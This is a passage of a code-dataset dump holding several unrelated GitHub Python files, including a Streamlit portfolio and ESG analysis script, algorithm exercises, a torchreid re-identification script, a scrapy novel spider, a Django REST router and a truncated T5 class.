Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_0['Sharpe Ratio'] = (df_0['Annual Return']-.02)/df_0['Annual SD']\r\n df_0 = df_0.dropna()\r\n \r\n\r\n # INDEX 1: Make API call and populate dataframe with Close, and Daily Return info\r\n df_1 = pdr.DataReader(ticker_1, 'yahoo', start_date, end_date)\r\n df_1 = df_1['Close']\r\n df_1 = pd.DataFrame(df_1)\r\n df_1['Daily Return'] = df_1['Close'].pct_change()\r\n df_1 = df_1.dropna()\r\n\r\n #INDEX 1: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_1['Annual Return'] = df_1['Daily Return'].rolling(window=252).mean()*252\r\n df_1['Annual SD'] = df_1['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_1['Sharpe Ratio'] = (df_1['Annual Return']-.02)/df_1['Annual SD']\r\n df_1 = df_1.dropna()\r\n\r\n # INDEX 2: Make API call and populate dataframe with Close, and Daily Return info\r\n df_2 = pdr.DataReader(ticker_2, 'yahoo', start_date, end_date)\r\n df_2 = df_2['Close']\r\n df_2 = pd.DataFrame(df_2)\r\n df_2['Daily Return'] = 
df_2['Close'].pct_change()\r\n df_2 = df_2.dropna()\r\n \r\n #INDEX 2: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_2['Annual Return'] = df_2['Daily Return'].rolling(window=252).mean()*252\r\n df_2['Annual SD'] = df_2['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_2['Sharpe Ratio'] = (df_2['Annual Return']-.02)/df_2['Annual SD']\r\n df_2 = df_2.dropna()\r\n\r\n # INDEX 3: Make API call and populate dataframe with Close, and Daily Return info\r\n df_3 = pdr.DataReader(ticker_3, 'yahoo', start_date, end_date)\r\n df_3 = df_3['Close']\r\n df_3 = pd.DataFrame(df_3)\r\n df_3['Daily Return'] = df_3['Close'].pct_change()\r\n df_3 = df_3.dropna()\r\n\r\n #INDEX 3: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_3['Annual Return'] = df_3['Daily Return'].rolling(window=252).mean()*252\r\n df_3['Annual SD'] = df_3['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_3['Sharpe Ratio'] = (df_3['Annual Return']-.02)/df_3['Annual SD']\r\n df_3 = df_3.dropna()\r\n \r\n\r\n # INDEX 4: Make API call and populate dataframe with Close, and Daily Return info\r\n df_4 = pdr.DataReader(ticker_4, 'yahoo', start_date, end_date)\r\n df_4 = df_4['Close']\r\n df_4 = pd.DataFrame(df_4)\r\n df_4['Daily Return'] = df_4['Close'].pct_change()\r\n df_4 = df_4.dropna()\r\n \r\n \r\n #INDEX 4: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_4['Annual Return'] = df_4['Daily Return'].rolling(window=252).mean()*252\r\n df_4['Annual SD'] = df_4['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_4['Sharpe Ratio'] = (df_4['Annual Return']-.02)/df_4['Annual SD']\r\n df_4 = df_4.dropna()\r\n\r\n # Add annual return for each ticker to portfolio dataframe\r\n\r\n df_portfolio.loc[0, 'Annual Return'] = df_0.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[1, 'Annual Return'] = df_1.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[2, 'Annual Return'] = df_2.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[3, 'Annual Return'] = df_3.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[4, 'Annual Return'] = df_4.loc['2021-11-23', 'Annual Return']\r\n \r\n\r\n # Add annual standard deviation for each ticker to portfolio dataframe\r\n\r\n df_portfolio.loc[0, 'Annual SD'] = df_0.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[1, 'Annual SD'] = df_1.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[2, 'Annual SD'] = df_2.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[3, 'Annual SD'] = df_3.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[4, 'Annual SD'] = df_4.loc['2021-11-23', 'Annual SD']\r\n \r\n\r\n # Add the Sharpe Ratio for each ticker to portfolio dataframe\r\n\r\n df_portfolio.loc[0, 'Sharpe Ratio'] = df_0.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[1, 'Sharpe Ratio'] = df_1.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[2, 'Sharpe Ratio'] = df_2.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[3, 'Sharpe Ratio'] = df_3.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[4, 'Sharpe Ratio'] = df_4.loc['2021-11-23', 'Sharpe Ratio']\r\n \r\n # Create a dataframe to store the weighted values of each firm\r\n metric_weights = pd.DataFrame(df_portfolio['Ticker'])\r\n metric_weights['weights'] = df_portfolio['weights']\r\n metric_weights['Weighted Annual Return'] = df_portfolio['weights'] * \\\r\n df_portfolio['Annual Return']\r\n metric_weights['Weighted Annual SD'] = df_portfolio['weights'] * \\\r\n df_portfolio['Annual SD']\r\n metric_weights['Weighted 
Sharpe Ratio'] = df_portfolio['weights'] * \\\r\n df_portfolio['Sharpe Ratio']\r\n\r\n # Create a dataframe of portfolio metrics\r\n portfolio_metrics = pd.DataFrame(columns=['', 'Metric'])\r\n\r\n portfolio_metrics.loc[0] = 'Portfolio Annual Return'\r\n portfolio_metrics.loc[0,\r\n 'Metric'] = metric_weights['Weighted Annual Return'].sum()\r\n\r\n portfolio_metrics.loc[1] = 'Portfolio Annual SD'\r\n portfolio_metrics.loc[1, 'Metric'] = metric_weights['Weighted Annual SD'].sum()\r\n\r\n portfolio_metrics.loc[2] = 'Portfolio Sharpe Ratio'\r\n portfolio_metrics.loc[2, 'Metric'] = ((portfolio_metrics.loc[0, 'Metric']-.02)\r\n / portfolio_metrics.loc[1, 'Metric'])\r\n\r\n portfolio_metrics = portfolio_metrics.set_index('')\r\n \r\n portfolio_metrics['SP 500 Benchmark'] = np.nan\r\n\r\n # Make a dataframe for the SP 500 to use as a benchmark for the Twitter portfolio\r\n sp_500 = pdr.DataReader('^GSPC', 'yahoo', start_date, end_date)\r\n sp_500 = sp_500['Close']\r\n sp_500 = pd.DataFrame(sp_500)\r\n sp_500['Daily Return'] = sp_500['Close'].pct_change()\r\n sp_500 = sp_500.dropna()\r\n\r\n # Calculate metrics for the SP 500\r\n sp_500['Annual Return'] = sp_500['Daily Return'].rolling(window=252).mean()*252\r\n sp_500['Annual SD'] = sp_500['Daily Return'].rolling(\r\n window=252).std()*np.sqrt(252)\r\n sp_500['Sharpe Ratio'] = (sp_500['Annual Return']-.02)/sp_500['Annual SD']\r\n sp_500 = sp_500.dropna()\r\n\r\n # Put the SP 500 metrics into the portfolio metrics dataframe\r\n\r\n portfolio_metrics.loc['Portfolio Annual Return',\r\n 'SP 500 Benchmark'] = sp_500.loc['2021-11-23', 'Annual Return']\r\n portfolio_metrics.loc['Portfolio Annual SD',\r\n 'SP 500 Benchmark'] = sp_500.loc['2021-11-23', 'Annual SD']\r\n portfolio_metrics.loc['Portfolio Sharpe Ratio',\r\n 'SP 500 Benchmark'] = sp_500.loc['2021-11-23', 'Sharpe Ratio']\r\n\r\n # Import the csv file of ESG data\r\n\r\n esg = pd.read_csv('ESG_data.csv', parse_dates=True)\r\n\r\n # INDEX 0: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_0_esg = esg[esg['Ticker'].str.contains(ticker_0)]\r\n ticker_0_esg['Date'] = pd.to_datetime(ticker_0_esg['Date'])\r\n ticker_0_esg = ticker_0_esg.set_index('Date')\r\n ticker_0_esg = ticker_0_esg.dropna()\r\n\r\n # INDEX 1: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_1_esg = esg[esg['Ticker'].str.contains(ticker_1)]\r\n ticker_1_esg['Date'] = pd.to_datetime(ticker_1_esg['Date'])\r\n ticker_1_esg = ticker_1_esg.set_index('Date')\r\n ticker_1_esg = ticker_1_esg.dropna()\r\n\r\n # INDEX 2: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_2_esg = esg[esg['Ticker'].str.contains(ticker_2)]\r\n ticker_2_esg['Date'] = pd.to_datetime(ticker_2_esg['Date'])\r\n ticker_2_esg = ticker_2_esg.set_index('Date')\r\n ticker_2_esg = ticker_2_esg.dropna()\r\n\r\n # INDEX 3: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_3_esg = esg[esg['Ticker'].str.contains(ticker_3)]\r\n ticker_3_esg['Date'] = pd.to_datetime(ticker_3_esg['Date'])\r\n ticker_3_esg = ticker_3_esg.set_index('Date')\r\n ticker_3_esg = ticker_3_esg.dropna()\r\n\r\n # INDEX 4: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_4_esg = esg[esg['Ticker'].str.contains(ticker_4)]\r\n ticker_4_esg['Date'] = pd.to_datetime(ticker_4_esg['Date'])\r\n 
ticker_4_esg = ticker_4_esg.set_index('Date')\r\n ticker_4_esg = ticker_4_esg.dropna()\r\n\r\n # Calculate the mean scores for the last available 12 months of ESG data to smooth out potential outliers\r\n\r\n yearly_esg_0 = ticker_0_esg.resample('Y').mean()\r\n yearly_esg_1 = ticker_1_esg.resample('Y').mean()\r\n yearly_esg_2 = ticker_2_esg.resample('Y').mean()\r\n yearly_esg_3 = ticker_3_esg.resample('Y').mean()\r\n yearly_esg_4 = ticker_4_esg.resample('Y').mean()\r\n\r\n #yearly_esg_4.iloc[-1:]\r\n\r\n df_portfolio['Total ESG'] = np.nan\r\n \r\n\r\n # Add the ESG scores to the portfolio dataframe\r\n\r\n df_portfolio.loc[0,'Total ESG'] = yearly_esg_0.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[1,'Total ESG'] = yearly_esg_1.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[2,'Total ESG'] = yearly_esg_2.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[3,'Total ESG'] = yearly_esg_3.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[4,'Total ESG'] = yearly_esg_4.loc['2021-12-31', 'Total-Score']\r\n\r\n\r\n # Apply the ESG scores to the metric weights dataframe\r\n\r\n metric_weights['Weighted Total ESG']= df_portfolio['weights']*df_portfolio['Total ESG']\r\n st.write('Portfolio Summary:', metric_weights)\r\n\r\n # Add the ESG metric to the portfolio metrics dataframe\r\n esg_row = pd.Series(['', ''])\r\n esg_row_df = pd.DataFrame([esg_row], index = ['Total ESG Score'], columns=['Metric','SP 500 Benchmark'])\r\n\r\n esg_row_df.loc['Total ESG Score','Metric'] = metric_weights['Weighted Total ESG'].sum()\r\n\r\n portfolio_metrics = pd.concat([portfolio_metrics, esg_row_df])\r\n\r\n \r\n st.write('Portfolio Summary:', portfolio_metrics)\r\n\r\n\r\n### *** FROM portfolio analysis v2.ipynb *** Gives the portfolio annual return, portfolio annual SD, portfolio sharpe ratio, total ESG score ###\r\n\r\n # TODO: Need to import a line graph (1 year) for the selected stock using an API\r\n\r\n elif selected_options == 'Crypto':\r\n st.markdown('Displayed ** Coin ** Information')\r\n st.write('Select a ** timeframe ** for the selected ** coin ** to get a fundamental analysis breakdown.')\r\n st.markdown('Select a Start Date')\r\n start_date = st.date_input(\"\", datetime(2020, 1, 1))\r\n st.write('Selected date:', start_date)\r\n\r\n\r\n\r\n # TODO: Need to import ESG score from the ESG_Data.file\r\n # TODO: Need to import a line graph (1 year) for the selected stock using an API\r\n \r\n\r\nelif options == 'Twitter Sentiment Analysis':\r\n st.write('Using information from Twitter to understand how to format our sharpe, calmar, sortino, treynor ratios for market evaluations.')\r\n st.sidebar.success(\"Trending on Twitter\")\r\n\r\n# Need to import information from TwitterSentimentAnalysis.ipynb and import the pie charts for this file here. 
\r\n","repo_name":"joebary/ESG_Twitter_Analysis_Project","sub_path":"investor_portfolio_v2.py","file_name":"investor_portfolio_v2.py","file_ext":"py","file_size_in_byte":25478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21898683392","text":"def solution(n):\r\n '''\r\n 단순 3진법이 아니라 3에 4가 오기 때문에 생각이 필요\r\n 몫과 나머지 이용하기 위해 divmod() 쓸 거임\r\n \r\n [4,1,2] 에서 나머지 index로 서서 삥삥 돌리는 방식\r\n \r\n 원래 3진법은 0,1,2만 옴 근데 이건 1,2,4가 옴\r\n \r\n n이 3의 배수가 아닐 때 :\r\n 그냥 3진법 쓰고 idx 적용하면 됨\r\n \r\n n이 3의 배수일 때 : \r\n 3으로 나누어 떨어지면 끝에는 무조건 4가 옴 (나머지 0이니까)\r\n \r\n 문제는 첫번째로 나누고 나서 그 이후 나머지가 한 index씩 밀려서 나옴\r\n \r\n 이건 idx -1 을 해줘서 보정해주면 그 다음 몫에서 에러가 남 \r\n \r\n 그냥 몫-1을 해줘서 idx를 하나씩 밀어주는 방법 채택\r\n \r\n '''\r\n answer = ''\r\n \r\n idx_lst = ['4','1','2']\r\n \r\n \r\n while n : \r\n n, mod = divmod(n, 3) ## 몫과 나머지 구하기\r\n answer += str(idx_lst[mod]) ## 하나씩 추가\r\n \r\n if not mod : ## mod가 0이 아니면\r\n n -= 1 ## n-1을 해줘서 나머지 idx가 밀리는 현상 보정\r\n \r\n return answer[::-1] ## +=로 추가했으므로 뒤집어서 마무리\r\n\r\n\r\n'''\r\n11 : 42\r\n12 : 44\r\n13 : 111\r\n14 : 112\r\n15 : 114\r\n16 : 121\r\n17 : 122\r\n18 : 124\r\n'''","repo_name":"paragonyun/CodingTest-Practice","sub_path":"프로그래머스/124 나라의 숫자.py","file_name":"124 나라의 숫자.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8543847581","text":"# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\nfrom pathlib import Path\n\nfrom ..utils import findpaths\n\n\ndef iterpath(path):\n for parent in reversed(path.parents):\n if len(parent.name) > 0:\n yield parent.name\n yield path.name\n\n\nclass ReferenceCounter:\n def __init__(self):\n self.files = {}\n self.sets = []\n\n def addpath(self, path, jobid):\n curfiles = self.files\n for elem in iterpath(path.resolve()):\n if elem not in curfiles:\n curfiles[elem] = {}\n curfiles = curfiles[elem]\n if 0 not in curfiles or not isinstance(curfiles[0], set):\n curfiles[0] = set()\n self.sets.append(curfiles[0])\n curfiles[0].add(jobid)\n\n def put(self, result, jobid=0):\n paths = findpaths(result)\n while len(paths) > 0:\n path = Path(paths.pop())\n if path.is_dir():\n paths.extend(path.iterdir())\n else:\n self.addpath(path, jobid)\n\n def pop(self, jobid):\n for s in self.sets:\n if jobid in s:\n s.remove(jobid)\n\n def can_delete(self, path):\n if not isinstance(path, Path):\n path = Path(path)\n curfiles = self.files\n for elem in iterpath(path):\n if elem not in curfiles:\n return True\n curfiles = curfiles[elem]\n filesstack = [curfiles]\n while len(filesstack) > 0:\n files = filesstack.pop()\n for k, v in files.items():\n if k == 0:\n if len(v) > 0:\n return False\n else:\n filesstack.append(v)\n return True\n","repo_name":"mindandbrain/pipeline","sub_path":"pipeline/plugins/refcount.py","file_name":"refcount.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"27059082552","text":"import sys\n\ninput = sys.stdin.readlines\nprint = sys.stdout.write\nfrom collections import deque\n\n\ndef mergesort(arr):\n if len(arr) == 1:\n return arr\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n left = mergesort(left)\n right = mergesort(right)\n return merge(left, right)\n\n\ndef merge(left, right):\n result = deque()\n while len(left) > 0 or len(right) > 0:\n if len(left) > 0 and 
len(right) > 0:\n if left[0] > right[0]:\n result.append(right[0])\n right.popleft()\n else:\n result.append(left[0])\n left.popleft()\n elif len(left) > 0:\n result.append(left[0])\n left.popleft()\n elif len(right) > 0:\n result.append(right[0])\n right.popleft()\n return result\n\n\nn = int(input())\narr = deque(map(int, input().split()))\narr = mergesort(arr)\n\n","repo_name":"tjdgns1284/Algo-CS","sub_path":"csagain/0831/merges2.py","file_name":"merges2.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29361873195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 27 17:23:08 2021\n\n@author: William\n\"\"\"\n\n\n\n\n\n\n\n\n\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport sys\nimport re\nimport os\nimport glob\nimport os.path as osp\n\nfrom torchreid.data import ImageDataset\n\n\n\nclass Wyze2(ImageDataset):\n dataset_dir = 'wyze2'\n\n def __init__(self, root='', **kwargs):\n self.root = osp.abspath(osp.expanduser(root))\n self.dataset_dir = osp.join(self.root, self.dataset_dir)\n\n # All you need to do here is to generate three lists,\n # which are train, query and gallery.\n # Each list contains tuples of (img_path, pid, camid),\n # where\n # - img_path (str): absolute path to an image.\n # - pid (int): person ID, e.g. 0, 1.\n # - camid (int): camera ID, e.g. 0, 1.\n # Note that\n # - pid and camid should be 0-based.\n # - query and gallery should share the same pid scope (e.g.\n # pid=0 in query refers to the same person as pid=0 in gallery).\n # - train, query and gallery share the same camid scope (e.g.\n # camid=0 in train refers to the same camera as camid=0\n \n self.train_dir = osp.join(self.dataset_dir, 'train')\n self.query_dir = osp.join(self.dataset_dir, 'query')\n self.gallery_dir = osp.join(self.dataset_dir, 'gallery')\n \n # in query/gallery).\n train = self.process_dir(self.train_dir)\n query = self.process_dir(self.query_dir)\n gallery = self.process_dir(self.gallery_dir)\n\n super(Wyze2, self).__init__(train, query, gallery, **kwargs)\n \n def process_dir(self, dir_path):\n data = []\n img_paths = glob.glob(osp.join(dir_path, '*.jpg'))\n for img_path in img_paths:\n path_list = img_path.split(os.sep)\n img_name = path_list[6]\n pid, camid, img_num = img_name.split(\"_\")\n \n pid_num = int(re.findall(r'\\d+', pid)[0])\n camid_num = int(re.findall(r'\\d+', camid)[0])\n \n data.append((img_path, pid_num, camid_num))\n \n return data\n\n\n\n\n\n\n\n\n\n\n\nimport torchreid\n\n\n\n\n\ndef main ():\n #register once and then comment out\n torchreid.data.register_image_dataset('wyze2', Wyze2)\n #Load data manager\n \n #transforms=['random_flip', 'random_crop'] removed transofrms to solve an error\n #datamanager = torchreid.data.ImageDataManager(\n # root='reid-data',\n # sources= 'ilidsvid',\n # targets= 'ilidsvid', #can make this \"wyze2\"\n #height=256,\n #width=128,\n #batch_size_train=32, #batch size 2 for my dataset\n #batch_size_test=100 #batch size 2 for my dataset\n #)\n \n datamanager = torchreid.data.VideoDataManager(\n root='reid-data',\n sources='ilidsvid',\n height=256,\n width=128,\n batch_size_train=3,\n batch_size_test=3,\n seq_len=15,\n sample_method='evenly'\n )\n \n #Build model\n model = torchreid.models.build_model(\n name='osnet_x1_0',\n num_classes=datamanager.num_train_pids, #originally was this but to load a checkpoint we need to match the trained model class 
count datamanager.num_train_pids,\n loss='softmax',\n pretrained=False\n )\n \n #initialize model\n model = model.cuda()\n \n \n #setup optimizer\n optimizer = torchreid.optim.build_optimizer(\n model,\n optim='adam',\n lr=0.0003\n )\n \n #setup scheduler\n scheduler = torchreid.optim.build_lr_scheduler(\n optimizer,\n lr_scheduler='single_step',\n stepsize=20\n )\n \n \n #Build engine\n engine = torchreid.engine.ImageSoftmaxEngine(\n datamanager,\n model,\n optimizer=optimizer,\n scheduler=scheduler,\n label_smooth=True\n )\n\n #start_epoch = torchreid.utils.resume_from_checkpoint(\n # 'log/osnet/model/osnet_x1_0_market.pth',\n # model,\n # optimizer\n #) \n \n #run training and test\n engine.run(\n save_dir='log/osnet',\n max_epoch=10, #make start_epoch when loading and testing\n eval_freq=10,\n print_freq=50,\n visrank = True,\n visrank_topk=2,\n test_only=True\n )\n \nif __name__ == \"__main__\":\n main()","repo_name":"wdwright90/Wyze2_marauders_map","sub_path":"REID_model/my_torch_reid/my_torchreid.py","file_name":"my_torchreid.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2366682165","text":"import torch\nimport math\nfrom collections import defaultdict\n\nclass Representation():\n\n def __init__(self, dim=4, device=\"cpu\"):\n self.dim = dim\n self.device = device\n self.params = dim * (dim - 1) // 2\n self.thetas = torch.autograd.Variable(math.pi*(2*torch.rand(self.params, device=self.device)-1) / dim,\n requires_grad=True)\n\n self.clear_matrix()\n\n def set_thetas(self, thetas):\n self.thetas = thetas.to(self.device)\n self.thetas.requires_grad = True\n self.clear_matrix()\n\n def clear_matrix(self):\n '''Clear the cached unitary matrix.\n\n The action matrix is cached to avoid re-calculating them at every step. However,\n if the underlying thetas are changed (e.g. 
after a step of SGD), this cache must\n be cleared so that the correct matrix is re-calculated and cached in its place.\n '''\n self.__matrix = defaultdict(lambda: None)\n\n def get_matrix(self, magnitude=1):\n if self.__matrix[magnitude] is None:\n k = 0\n mats = []\n for i in range(self.dim - 1):\n for j in range(self.dim - 1 - i):\n theta_ij = self.thetas[k] * magnitude\n k += 1\n c, s = torch.cos(theta_ij), torch.sin(theta_ij)\n\n rotation_i = torch.eye(self.dim, self.dim)\n rotation_i[i, i] = c\n rotation_i[i, i + j + 1] = s\n rotation_i[j + i + 1, i] = -s\n rotation_i[j + i + 1, j + i + 1] = c\n\n mats.append(rotation_i)\n\n def chain_mult(l):\n if len(l) >= 3:\n return l[0] @ l[1] @ chain_mult(l[2:])\n elif len(l) == 2:\n return l[0] @ l[1]\n else:\n return l[0]\n\n self.__matrix[magnitude] = chain_mult(mats).to(self.device)\n\n return self.__matrix[magnitude]","repo_name":"tomdbar/dynamical-disentanglement","sub_path":"src/representations.py","file_name":"representations.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"29806957901","text":"import re\nimport scrapy\nfrom ..items import Qd09TongrenItem_01\nclass TongrenSpider(scrapy.Spider):\n name = 'tongren_01'\n allowed_domains = []\n start_urls = [f'https://www.tongrenquan.org/tags-150-{page}.html' for page in range(0,52)]\n def parse(self, response):\n divs=response.css('.box div>.bk')\n for i in divs:\n link=i.css('a::attr(href)').get()\n link='https://www.tongrenquan.org'+link\n yield scrapy.Request(url=link,callback=self.parse_link)\n def parse_link(self,response):\n title=response.css('.clearfix .infos h1::text').get()\n span=response.css('.clearfix .infos .date span::text').get()\n lis=response.css('.book_list .clearfix>li')\n for i in lis:\n link=i.css('a::attr(href)').get()\n link='https://www.tongrenquan.org'+link\n yield scrapy.Request(url=link,callback=self.parse_text,meta={'title':title,'span':span})\n def parse_text(self,response):\n title=response.meta['title']\n span=response.meta['span']\n h1 = response.xpath('//div[@class=\"read_chapterName tc\"]/h1/text()').extract_first()\n text = response.xpath('//div[@class=\"read_chapterDetail\"]/p/text()').extract()\n text = '\\n'.join(text)\n yield Qd09TongrenItem_01(title=title,span=span, h1=h1,text=text)\n","repo_name":"wang2206/scrapy_text","sub_path":"qd_09_tongren/spiders/tongren_01.py","file_name":"tongren_01.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25052140868","text":"from easy_api_builder.builder import apiBuilder, easyRequest\r\n\r\njson_response = \\\r\n{\r\n \"easy_api_builder.Version\": 0.1,\r\n \"downloads\": \"200+\"\r\n}\r\n\r\nbuilder = apiBuilder()\r\napi = builder.build_auth_api(json_response, [\"key\", \"key2\"], \"/\")\r\nbuilder.start(port=80)\r\n\r\n\r\n\r\n","repo_name":"Areoxy/easy_api_builder","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71742012643","text":"# 2018 Winter Olympics Medals won by Country.\nimport plotly.offline as pyo\nimport plotly.graph_objs as go\nimport pandas as pd\n\ndf = pd.read_csv('data1.csv')\n\ndata = [go.Bar(\n x=df['NOC'], \n y=df['Total']\n)]\nlayout = go.Layout(\n title='Erasmus students outgoing Spain, Poland and Turkey'\n)\nfig = go.Figure(data=data, 
layout=layout)\npyo.plot(fig, filename='bar1.html')","repo_name":"daniel3423/scrum_day11.1","sub_path":"examples/bar1.py","file_name":"bar1.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23565262194","text":"\"\"\" Problem statement:\nhttps://leetcode.com/problems/sliding-window-maximum/description/\n\"\"\"\nimport random\nfrom collections import deque\n\n\nclass Solution:\n def max_window_brute(self, nums, k):\n \"\"\" Brute force algorithm.\n Time complexity: O(n * k). Space complexity: O(1), n is len(nums).\n \"\"\"\n n = len(nums)\n max_window = []\n for i in range(0, n - k + 1):\n curr_max = float(\"-inf\")\n for j in range(i, i + k): # find max in current window\n curr_max = max(curr_max, nums[j])\n max_window.append(curr_max)\n return max_window\n\n def max_window_deque(self, nums, k):\n \"\"\" Algorithm based on using dequeue. Assumes k <= len(nums).\n Time complexity: O(n). Space complexity: O(k), n is len(nums).\n \"\"\"\n if not nums: # special case, empty array\n return []\n if k > len(nums): # special case, k > len(nums)\n return [max(nums)]\n\n max_window = [] # resulting window\n deq = deque() # contains indices of the elements of nums\n # add index of elements to the dequeue from the 1st window\n for i in range(k):\n # remove all elements that <= current added element\n while deq and nums[deq[-1]] <= nums[i]:\n deq.pop() # remove from the right\n deq.append(i) # add from the right\n max_window.append(nums[deq[0]]) # add max element from the 1st window\n\n # loop over nums and check all other windows\n for i in range(k, len(nums)):\n # remove elements that fall out from the current window\n while deq and deq[0] <= i - k:\n deq.popleft() # remove from the left\n # remove all elements that <= current added element\n while deq and nums[deq[-1]] <= nums[i]:\n deq.pop()\n deq.append(i)\n max_window.append(nums[deq[0]]) # add current max to the result\n return max_window\n\n\ndef stress_test(func1, func2, n):\n \"\"\" Stress tests two functions against each other on a random input array.\n \"\"\"\n while True:\n nums = [random.randrange(1, 10**6) for i in range(n)]\n k = random.randrange(1, n + 1)\n res1 = func1(nums, k)\n res2 = func2(nums, k)\n if res1 == res2:\n print(\"OK\")\n print(res1[:10])\n else:\n print(f\"nums = {nums}\")\n print(f\"k = {k}\")\n print(f\"result 1 = {res1}\")\n print(f\"result 2 = {res2}\")\n break\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n func = sol.max_window_deque\n\n # small tests\n assert func([1, 3, -1, -3, 5, 3, 6, 7], 3) == [3, 3, 5, 5, 6, 7]\n assert func([8, 5, 10, 7, 9, 4, 15, 12, 90, 13], 4) == [10, 10, 10, 15, 15, 90, 90]\n\n # stress testing slow and fast algorithms\n func1 = sol.max_window_brute\n func2 = sol.max_window_deque\n stress_test(func1, func2, 10**2)\n","repo_name":"vladn90/Algorithms","sub_path":"Stack/sliding_window_maximum.py","file_name":"sliding_window_maximum.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1645100424","text":"from typing import Tuple, List, Optional, Any, Dict, Union\n\nfrom rest_framework.routers import SimpleRouter, Route, DynamicRoute\nfrom django.views import View\n\n\n# (self, prefix, viewset, basename=None)\nRouteArg = Union[\n Tuple[str, View, Optional[str]],\n Tuple[str, View]\n]\n\n\nclass DefaultRouter(SimpleRouter):\n routes = [\n # List route.\n Route(\n 
url=r'^{prefix}{trailing_slash}$',\n mapping={\n 'get': 'list',\n 'post': 'create'\n },\n name='{basename}.list',\n detail=False,\n initkwargs={'suffix': 'List'}\n ),\n # Dynamically generated list routes. Generated using\n # @action(detail=False) decorator on methods of the viewset.\n DynamicRoute(\n url=r'^{prefix}/{url_path}{trailing_slash}$',\n name='{basename}.{url_name}',\n detail=False,\n initkwargs={}\n ),\n # Detail route.\n Route(\n url=r'^{prefix}/{lookup}{trailing_slash}$',\n mapping={\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n },\n name='{basename}.detail',\n detail=True,\n initkwargs={'suffix': 'Instance'}\n ),\n # Dynamically generated detail routes. Generated using\n # @action(detail=True) decorator on methods of the viewset.\n DynamicRoute(\n url=r'^{prefix}/{lookup}/{url_path}{trailing_slash}$',\n name='{basename}.{url_name}',\n detail=True,\n initkwargs={}\n ),\n ]\n\n def __init__(\n self, routes: Optional[List[RouteArg]] = None, trailing_slash=True,\n *args: List[Any], **kwargs: Dict[str, Any]\n ):\n super().__init__(trailing_slash=trailing_slash, *args, **kwargs)\n\n if routes:\n route: RouteArg\n for route in routes:\n self.register(*route)","repo_name":"rypconsultores/sernatur-backend","sub_path":"apps/c19trace/rest/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25491218807","text":"from numpy import datetime_data\nfrom transformers import T5Tokenizer,T5ForConditionalGeneration,T5Config\nfrom torch import nn\nimport numpy as np\nimport torch\nimport pickle\nclass MNLIT5(nn.Module):\n def __init__(self,original_t5:bool,checkpoint:str,soft_prompt:bool,prefix:str,infix:str,suffix:str):\n super(MNLIT5,self).__init__()\n self.original_t5=original_t5\n self.config=T5Config.from_pretrained(checkpoint) \n 